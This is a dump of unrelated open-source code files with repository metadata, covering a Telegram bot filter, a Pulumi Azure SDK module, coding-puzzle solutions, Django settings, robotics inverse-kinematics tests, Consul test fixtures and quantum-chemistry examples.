LOGGER.exception(e)
raise(e)
raw_input("Press enter to exit")
|
[
"k.nielsen81@gmail.com"
] |
k.nielsen81@gmail.com
|
929c36a16c6510056a32e3a51fdc66da8a0b0bae
|
47deebe6fefedb01fdce5d4e82f58bb08f8e1e92
|
/python core/Lesson_35/own_filter.py
|
88b22438ef99e205d34e4d28385a56a6dc930970
|
[] |
no_license
|
developeryuldashev/python-core
|
5bb162603bdb5782acf05e3fb25ca5dd6347067a
|
08fca77c9cfde69d93a7875b3fb65b98f3dabd78
|
refs/heads/main
| 2023-08-21T03:33:12.160133
| 2021-10-19T04:56:53
| 2021-10-19T04:56:53
| 393,383,696
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
from telegram.ext import MessageFilter
class HandlePython(MessageFilter):
name='Filters.python'
def filter(self, message):
return 'python' in message
python=HandlePython()
class FilterAwesome(MessageFilter):
def filter(self, message):
return 'Dilshod' in message.text
filter_awesome=FilterAwesome()
class FilterRaxmat(MessageFilter):
def raxmat(self,message):
return 'raxmat' in message.text
filter_raxmat=FilterRaxmat()
|
[
"81365808+developeryuldashev@users.noreply.github.com"
] |
81365808+developeryuldashev@users.noreply.github.com
|
ef244246907dc513e7d6480d145bca83363884b1
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/sql/v20210201preview/get_sync_agent.py
|
c041588b469bf583ea5fe3162b8e9d913380dff9
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,746
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetSyncAgentResult',
'AwaitableGetSyncAgentResult',
'get_sync_agent',
'get_sync_agent_output',
]
@pulumi.output_type
class GetSyncAgentResult:
"""
An Azure SQL Database sync agent.
"""
def __init__(__self__, expiry_time=None, id=None, is_up_to_date=None, last_alive_time=None, name=None, state=None, sync_database_id=None, type=None, version=None):
if expiry_time and not isinstance(expiry_time, str):
raise TypeError("Expected argument 'expiry_time' to be a str")
pulumi.set(__self__, "expiry_time", expiry_time)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if is_up_to_date and not isinstance(is_up_to_date, bool):
raise TypeError("Expected argument 'is_up_to_date' to be a bool")
pulumi.set(__self__, "is_up_to_date", is_up_to_date)
if last_alive_time and not isinstance(last_alive_time, str):
raise TypeError("Expected argument 'last_alive_time' to be a str")
pulumi.set(__self__, "last_alive_time", last_alive_time)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if sync_database_id and not isinstance(sync_database_id, str):
raise TypeError("Expected argument 'sync_database_id' to be a str")
pulumi.set(__self__, "sync_database_id", sync_database_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if version and not isinstance(version, str):
raise TypeError("Expected argument 'version' to be a str")
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="expiryTime")
def expiry_time(self) -> str:
"""
Expiration time of the sync agent version.
"""
return pulumi.get(self, "expiry_time")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isUpToDate")
def is_up_to_date(self) -> bool:
"""
If the sync agent version is up to date.
"""
return pulumi.get(self, "is_up_to_date")
@property
@pulumi.getter(name="lastAliveTime")
def last_alive_time(self) -> str:
"""
Last alive time of the sync agent.
"""
return pulumi.get(self, "last_alive_time")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def state(self) -> str:
"""
State of the sync agent.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="syncDatabaseId")
def sync_database_id(self) -> Optional[str]:
"""
ARM resource id of the sync database in the sync agent.
"""
return pulumi.get(self, "sync_database_id")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def version(self) -> str:
"""
Version of the sync agent.
"""
return pulumi.get(self, "version")
class AwaitableGetSyncAgentResult(GetSyncAgentResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSyncAgentResult(
expiry_time=self.expiry_time,
id=self.id,
is_up_to_date=self.is_up_to_date,
last_alive_time=self.last_alive_time,
name=self.name,
state=self.state,
sync_database_id=self.sync_database_id,
type=self.type,
version=self.version)
def get_sync_agent(resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
sync_agent_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSyncAgentResult:
"""
An Azure SQL Database sync agent.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server on which the sync agent is hosted.
:param str sync_agent_name: The name of the sync agent.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
__args__['syncAgentName'] = sync_agent_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:sql/v20210201preview:getSyncAgent', __args__, opts=opts, typ=GetSyncAgentResult).value
return AwaitableGetSyncAgentResult(
expiry_time=__ret__.expiry_time,
id=__ret__.id,
is_up_to_date=__ret__.is_up_to_date,
last_alive_time=__ret__.last_alive_time,
name=__ret__.name,
state=__ret__.state,
sync_database_id=__ret__.sync_database_id,
type=__ret__.type,
version=__ret__.version)
@_utilities.lift_output_func(get_sync_agent)
def get_sync_agent_output(resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
sync_agent_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSyncAgentResult]:
"""
An Azure SQL Database sync agent.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server on which the sync agent is hosted.
:param str sync_agent_name: The name of the sync agent.
"""
...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
72536ffc2001ee0a6739dd5cbc5f200e014063a0
|
5ed2d0e107e4cdcd8129f418fdc40f1f50267514
|
/Medium/WordBreak/test.py
|
b3be093b1de892e18dfc3f8c3a1b7047621616fd
|
[] |
no_license
|
tliu57/Leetcode
|
6cdc3caa460a75c804870f6615653f335fc97de1
|
c480697d174d33219b513a0b670bc82b17c91ce1
|
refs/heads/master
| 2020-05-21T03:14:07.399407
| 2018-07-08T18:50:01
| 2018-07-08T18:50:01
| 31,505,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
class Solution(object):
def wordBreak(self, s, wordDict):
dp = [0 for i in range(len(s)+1)]
dp[0] = 1
for i in range(1, len(s)+1):
for j in range(0, i):
dp[i] = dp[j] and (s[j:i] in wordDict)
if dp[i]:
break
return dp[len(s)]
sol = Solution()
print sol.wordBreak("leetcode", ["leet", "code"])
|
[
"tliu57@asu.edu"
] |
tliu57@asu.edu
|
43db92d549c4350589805bb14e755300ffbd27b8
|
29345337bf86edc938f3b5652702d551bfc3f11a
|
/python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_fpgrowth.py
|
320e2b8f49396dfb6cd99a9decade08889f1534a
|
[
"Apache-2.0"
] |
permissive
|
vacaly/Alink
|
32b71ac4572ae3509d343e3d1ff31a4da2321b6d
|
edb543ee05260a1dd314b11384d918fa1622d9c1
|
refs/heads/master
| 2023-07-21T03:29:07.612507
| 2023-07-12T12:41:31
| 2023-07-12T12:41:31
| 283,079,072
| 0
| 0
|
Apache-2.0
| 2020-07-28T02:46:14
| 2020-07-28T02:46:13
| null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
import unittest
import numpy as np
import pandas as pd
from pyalink.alink import *
class TestFpGrowth(unittest.TestCase):
def test_fpgrowth(self):
data = np.array([
["A,B,C,D"],
["B,C,E"],
["A,B,C,E"],
["B,D,E"],
["A,B,C,D"],
])
df_data = pd.DataFrame({
"items": data[:, 0],
})
data = dataframeToOperator(df_data, schemaStr='items string', op_type="batch")
fpGrowth = FpGrowthBatchOp() \
.setItemsCol("items") \
.setMinSupportPercent(0.4) \
.setMinConfidence(0.6)
fpGrowth.linkFrom(data)
fpGrowth.print()
fpGrowth.getSideOutput(0).print()
|
[
"shaomeng.wang.w@gmail.com"
] |
shaomeng.wang.w@gmail.com
|
5bdcfff19eab4786af18070910c55548fcd426dc
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02909/s681576776.py
|
241c49b560159f84603785465ffd994ee3525f21
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
py
|
import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
S = input()
p = ["Sunny", "Cloudy", "Rainy"]
print(p[(p.index(S) + 1) % 3])
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
c96f6aeeabc58d40d4d44ece2ada2adcf6232c01
|
66fc3d58e94e8340a0d825501776a1dea37c0198
|
/share/clf/process_clf_test_frames.py
|
aa63846e8c287609b0713bda9dd25814f6949612
|
[
"CC-BY-4.0",
"BSD-3-Clause"
] |
permissive
|
AcademySoftwareFoundation/OpenColorIO
|
dad370b54be147ae94f18ed6414d53bd76e9ef74
|
96f528fdfb7f9fb24388e33f6a968d29a3909cf8
|
refs/heads/main
| 2023-08-29T08:51:45.625957
| 2023-08-29T01:42:37
| 2023-08-29T01:42:37
| 775,131
| 843
| 236
|
BSD-3-Clause
| 2023-09-14T02:56:01
| 2010-07-14T18:22:06
|
C++
|
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
# Use OpenColorIO to apply the CLF files from the CLF test kit to the CLF target image
# and produce a directory of processed OpenEXR images at the specified location.
# Run the script with "-h" for usage information.
# This script is python 2.7 and python 3 compatible.
import os
import argparse
def process_frames( options ):
dst_path = options.dst_dir
use_gpu = options.gpu
opt_level = options.opt
# Check the arguments are as expected.
if not os.path.exists( dst_path ):
os.mkdir( dst_path )
if not os.path.isdir( dst_path ):
raise ValueError( "Destination path must be a directory: " + dst_path )
# Get the path to the CLF target image, relative to the path of this script.
script_path = os.path.abspath( __file__ )
parts = script_path.split( os.sep )
ocio_base_path = os.path.join( os.sep, *parts[0:-3] )
src_image = os.path.join( ocio_base_path, 'share', 'clf', 'CLF_testimage.exr' )
# Get the path to the CLF files, relative to the path of this script.
clf_path = os.path.join( ocio_base_path, 'tests', 'data', 'files', 'clf' )
# Set the optimization level. None or lossless avoids the fast SSE log/exponent.
# (Note that the decimal value is available by simply printing the enum in Python.)
if (opt_level == 'none') or (opt_level is None):
# For default for this script, use no optimization rather than OCIO's default optimization
# in order to apply the operators exactly as they appear in the CLF file with no attempt
# to speed up the processing.
print( 'Optimization level: None' )
os.environ["OCIO_OPTIMIZATION_FLAGS"] = "0"
elif opt_level == 'lossless':
print( 'Optimization level: Lossless' )
os.environ["OCIO_OPTIMIZATION_FLAGS"] = "144457667"
elif opt_level == 'default':
print( 'Optimization level: Default' )
else:
raise ValueError( 'Unexpected --opt argument.' )
# TODO: Add an option to turn on only SSE without removing any ops.
if use_gpu:
print( 'Processing on the GPU\n' )
cmd_base = 'ocioconvert --gpu --lut %s %s %s'
else:
print( 'Processing on the CPU\n' )
cmd_base = 'ocioconvert --lut %s %s %s'
# Iterate over each legal CLF file in the suite.
for f in os.listdir( clf_path ):
fname, ext = os.path.splitext( f )
if ext == '.clf':
# Build the full path to the file.
p = os.path.join( clf_path, f )
# Build the name of the destination image.
dst_image = os.path.join( dst_path, fname + '.exr' )
# Build the command.
cmd = cmd_base % (p, src_image, dst_image)
print('================='); print( cmd )
# Process the image.
os.system( cmd )
if __name__=='__main__':
import sys
import argparse
parser = argparse.ArgumentParser(description='Process CLF test images using OCIO.')
parser.add_argument('dst_dir',
help='Path to a directory where the result images will be stored.')
parser.add_argument('--gpu', action='store_true',
help='Process using the GPU rather than the CPU.')
parser.add_argument('--opt', choices=['none','lossless','default'],
help='Specify the OCIO optimization level. If not specified, "none" will be used.')
options = parser.parse_args(sys.argv[1:])
process_frames(options)
|
[
"noreply@github.com"
] |
AcademySoftwareFoundation.noreply@github.com
|
8a5f6c810c7991adc091d743259b6ed996eb5cd7
|
e49d49b54f2d5cd25674050419f991477363c46b
|
/myshop/myshop/settings.py
|
0a395ec79e6d309382afe3967821b0a84079f336
|
[] |
no_license
|
akashgiricse/online-shop
|
0d87323e016f5c8a48020abd1d973987abd86035
|
94438876b8b2dd530ec05cb3c8df1b6a049fa514
|
refs/heads/master
| 2020-04-10T12:00:02.644277
| 2018-12-24T17:27:06
| 2018-12-24T17:27:06
| 161,008,658
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,310
|
py
|
"""
Django settings for myshop project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'shop.apps.ShopConfig',
'cart.apps.CartConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
CART_SESSION_ID = 'cart'
|
[
"akashgiricse@gmail.com"
] |
akashgiricse@gmail.com
|
f80bb33e5349f60b61a5f79be62824f534c30071
|
52a0e6c0be7eebfde22c886ff7b8e605a27428ce
|
/src/looped/__init__.py
|
22239d5ad5b39afa66288653d476cd7ead07ba1e
|
[] |
no_license
|
vied12/LoopED
|
42d5663c36d7b0026196faa152a75576993fb30d
|
4126a2b655f68c20bd1029a4d69597dd877c18cb
|
refs/heads/master
| 2022-07-01T04:42:02.150799
| 2017-07-26T12:55:39
| 2017-07-26T12:55:39
| 84,230,616
| 1
| 1
| null | 2022-06-17T21:14:14
| 2017-03-07T18:05:26
|
CSS
|
UTF-8
|
Python
| false
| false
| 204
|
py
|
from .Led import create_led
from .animations import Jump, Tuner, Intro, Metronome
from .gamepads import WebGamePad
__all__ = [
'create_led',
'Jump',
'WebGamePad',
'Tuner',
'Intro',
]
|
[
"edou4rd@gmail.com"
] |
edou4rd@gmail.com
|
dec105911efbe7e1fcfffd57f3a39b128a4b12f8
|
4bd9d17a8697c0e87ce8b35e6189913d9f7dd1db
|
/legtool/gait/test_leg_ik.py
|
2ce98243e4217c2bdb3a010821e25e54a5c1ce3f
|
[
"Apache-2.0"
] |
permissive
|
jpieper/legtool
|
c72fe8a77871720f217634bb07602c709ba52583
|
ab3946051bd16817b61d3073ce7be8bd27af90d0
|
refs/heads/master
| 2020-05-21T11:34:15.762189
| 2014-12-01T02:15:46
| 2014-12-01T02:15:46
| 21,541,872
| 10
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,133
|
py
|
# Copyright 2014 Josh Pieper, jjp@pobox.com.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from . import leg_ik
def get_lizard_config():
config = leg_ik.Configuration()
config.coxa_length_mm = 50
config.femur_length_mm = 40
config.tibia_length_mm = 30
config.coxa_min_deg = -90
config.coxa_idle_deg = 0
config.coxa_max_deg = 90
config.femur_min_deg = -90
config.femur_idle_deg = 0
config.femur_max_deg = 90
config.tibia_min_deg = -90
config.tibia_idle_deg = 0
config.tibia_max_deg = 90
config.coxa_ident = 3
config.femur_ident = 4
config.tibia_ident = 5
return config
def test_lizard_3dof():
config = get_lizard_config()
point = leg_ik.Point3D(0, 90, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg) < 0.01
assert abs(result.tibia_deg) < 0.01
point = leg_ik.Point3D(0, 90, -25)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
point = leg_ik.Point3D(0, 90, -35)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg + 7.18) < 0.01
assert abs(result.tibia_deg - 7.78) < 0.01
point = leg_ik.Point3D(0, 95, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg) < 0.01
assert abs(result.femur_deg + 0.60) < 0.01
assert abs(result.tibia_deg - 10.20) < 0.01
# Now test some with coxa.
point = leg_ik.Point3D(20, 87.75, -30)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 12.84) < 0.01
assert abs(result.femur_deg) < 0.01
assert abs(result.tibia_deg) < 0.01
point = leg_ik.Point3D(20, 87.75, -25)
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 12.84) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
command_dict = result.command_dict()
assert sorted(command_dict.keys()) == [3, 4, 5]
assert command_dict[3] == result.coxa_deg
assert command_dict[4] == result.femur_deg
assert command_dict[5] == result.tibia_deg
# Try adding in some idle to the coxa.
config.coxa_idle_deg = 3.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 7.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
# And some idle to femur.
config.femur_idle_deg = 4.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 11.18) < 0.01
assert abs(result.tibia_deg + 6.58) < 0.01
# And some idle to tibia.
config.tibia_idle_deg = 5.0
result = leg_ik.lizard_3dof_ik(point, config)
assert abs(result.coxa_deg - 15.84) < 0.01
assert abs(result.femur_deg - 11.18) < 0.01
assert abs(result.tibia_deg + 1.58) < 0.01
# Now try setting the max coxa low enough that we should get None.
config.coxa_max_deg = 15.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is None
config.coxa_max_deg = 90.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is not None
# And set the tibia max deg low enough to get None.
config.femur_max_deg = 10.0
result = leg_ik.lizard_3dof_ik(point, config)
assert result is None
# We'll assume the other bounds (min, and tibia) are correct for
# now.
|
[
"jjp@pobox.com"
] |
jjp@pobox.com
|
dd539a81c74353ac014e0b9b7bf8636a6b5d7ef4
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p04020/s011481880.py
|
cd16b5ea063aa01e01e9a52b7814e2636bd9e260
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
n = int(input())
a = [int(input()) for _ in range(n)]
lsts = []
temp = []
for aa in a:
if aa == 0:
if temp:
lsts.append(temp)
temp = []
else:
temp.append(aa)
if temp: lsts.append(temp)
ans = 0
for lst in lsts:
for i, aa in enumerate(lst):
ans += aa // 2
if i != len(lst)-1:
lst[i+1] -= aa % 2
ans += aa % 2
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
78ea63e50440ee9e3830cc8df7eb1b07d9a104d5
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/want_part/know_great_company.py
|
48b6a068bf3763ad3f82345d0496999bf868095a
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
#! /usr/bin/env python
def say_thing(str_arg):
world(str_arg)
print('week')
def world(str_arg):
print(str_arg)
if __name__ == '__main__':
say_thing('life')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
83e5c5465a611338cfc230da42437fe7ef263507
|
78628a4c5e4b37167b79f3b9072b30a7772d5c44
|
/tests/base.py
|
714abff7179532719b0b362d02242c4f08e11feb
|
[
"BSD-3-Clause"
] |
permissive
|
mdelagrange/consulate
|
35f8f02b1568a3d70bbcbab9796ffe7fcfc23a0a
|
312f36245aa43da2e0624e2b53dacd52986061d3
|
refs/heads/master
| 2020-12-28T20:09:10.805411
| 2018-03-13T22:41:46
| 2018-03-13T22:41:46
| 38,765,620
| 0
| 0
|
BSD-3-Clause
| 2018-07-13T19:21:42
| 2015-07-08T16:20:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
import functools
import json
import os
import unittest
import uuid
import httmock
import consulate
from consulate import exceptions
with open('testing/consul.json', 'r') as handle:
CONSUL_CONFIG = json.load(handle)
def generate_key(func):
@functools.wraps(func)
def _decorator(self, *args, **kwargs):
key = str(uuid.uuid4())[0:8]
self.used_keys.append(key)
func(self, key)
return _decorator
@httmock.all_requests
def raise_oserror(_url_unused, _request):
raise OSError
class TestCase(unittest.TestCase):
def setUp(self):
self.consul = consulate.Consul(
host=os.environ['CONSUL_HOST'],
port=os.environ['CONSUL_PORT'],
token=CONSUL_CONFIG['acl_master_token'])
self.forbidden_consul = consulate.Consul(
host=os.environ['CONSUL_HOST'],
port=os.environ['CONSUL_PORT'],
token=str(uuid.uuid4()))
self.used_keys = list()
def tearDown(self):
for key in self.consul.kv.keys():
self.consul.kv.delete(key)
checks = self.consul.agent.checks()
for name in checks:
self.consul.agent.check.deregister(checks[name]['CheckID'])
services = self.consul.agent.services()
for name in services:
self.consul.agent.service.deregister(services[name]['ID'])
for acl in self.consul.acl.list():
if acl['ID'] == CONSUL_CONFIG['acl_master_token']:
continue
try:
uuid.UUID(acl['ID'])
self.consul.acl.destroy(acl['ID'])
except (ValueError, exceptions.ConsulateException):
pass
|
[
"gavinr@aweber.com"
] |
gavinr@aweber.com
|
5bf2243fd6a0eb7978234834a4fafd6a6e57a05f
|
9dc6f8d91dc56523b9688990d4ae413b0bcbd4e1
|
/examples/x2c/02-basis_for_x.py
|
4789dc7470317b423c53acb4b0634b9b695430ef
|
[
"Apache-2.0"
] |
permissive
|
sunqm/pyscf
|
566bc2447d8072cff442d143891c12e6414de01c
|
dd179a802f0a35e72d8522503172f16977c8d974
|
refs/heads/master
| 2023-08-15T18:09:58.195953
| 2023-03-27T21:02:03
| 2023-03-27T21:02:03
| 159,149,096
| 80
| 26
|
Apache-2.0
| 2022-02-05T00:19:24
| 2018-11-26T10:10:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,764
|
py
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
X2c method use the uncontracted large component basis to construct the X
matrix. The basis for X matrix can have a big impact to the total energy.
X2c treatment is not variational. The total energy often increases when the
quality of large component basis is improved. This is due to the fact that the
X2c ground state is an "excited" state in the framework of full-relativistic
spectrum. When X2c Hamiltonian was constructed, the negative states are
projected out. Excited state is not bounded from below. Depending on the
quality of the basis for large component (which dominates positive states) and
small component (which dominates negative states), X2c energy may first
decrease then increase when systematically increase the size of basis set.
This example shows how to adjust X basis so that you get consistent
contributions from X matrix for different large component basis. When the
uncertainty of X matrix was removed, you may observe the monotonic energy
convergence wrt basis size.
'''
from pyscf import gto
from pyscf import scf
# A combined basis: uncontracted ANO basis plus some steep even-tempered Gaussians
xbasis = ('unc-ano',
gto.etbs([(0, 8, 1e7, 2.5), # s-function
(1, 5, 5e4, 2.5), # p-function
(2, 2, 1e3, 2.5)])) # d-function
mol = gto.M(atom = 'Zn',
basis = 'ccpvdz-dk',
)
mf = scf.RHF(mol).x2c()
# Assigning a different basis to X matrix
mf.with_x2c.basis = xbasis
mf.run()
mol = gto.M(atom = 'Zn',
basis = 'ccpvtz-dk',
)
mf = scf.RHF(mol).x2c()
mf.with_x2c.basis = xbasis
mf.run()
mol = gto.M(atom = 'Zn',
basis = 'ccpvqz-dk',
)
mf = scf.RHF(mol).x2c()
mf.with_x2c.basis = xbasis
mf.run()
|
[
"osirpt.sun@gmail.com"
] |
osirpt.sun@gmail.com
|
3fd5ea8193c7d437c0c1beb0fe3a0b1745922583
|
4b7f32e791739a09a201708a3350836156d59287
|
/moderate/trailing-string(AC).py
|
697e86dcd2d80270fb7e53b31fe98c768ba7fbaa
|
[] |
no_license
|
zhuli19901106/codeeval
|
6170849a4acbc442b957d80c410df2bcf1b09efb
|
301dcaf0098eafb776145bfa347d9eb2ee22d4e2
|
refs/heads/master
| 2020-06-04T20:50:25.391877
| 2015-05-18T23:13:13
| 2015-05-18T23:13:23
| 34,080,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
import re
if __name__ == '__main__':
while True:
try:
s = raw_input()
except EOFError:
break
a, b = re.split(',', s)
if len(b) > len(a):
print(0)
continue
if a[len(a) - len(b): len(a)] == b:
print(1)
else:
print(0)
|
[
"zhuli19901106@gmail.com"
] |
zhuli19901106@gmail.com
|
bf6ba6b1402f5be62ec4a9f13ac0645075bdfe65
|
4568ff25aaafc821d18e331b0253a1246cd03c8f
|
/benchmark/experiments/basic_moo.py
|
ee9e35ecb246b008940c41dbe3f014755bedf038
|
[
"Apache-2.0"
] |
permissive
|
anyoptimization/pymoo-benchmark
|
42a7804967d03b70620d42fba5f756d288b1f6f4
|
37460f3bf0159c1113cd48d5698af6493f26ed62
|
refs/heads/main
| 2023-07-31T17:20:17.294345
| 2021-09-23T20:31:39
| 2021-09-23T20:31:39
| 387,559,302
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
import numpy as np
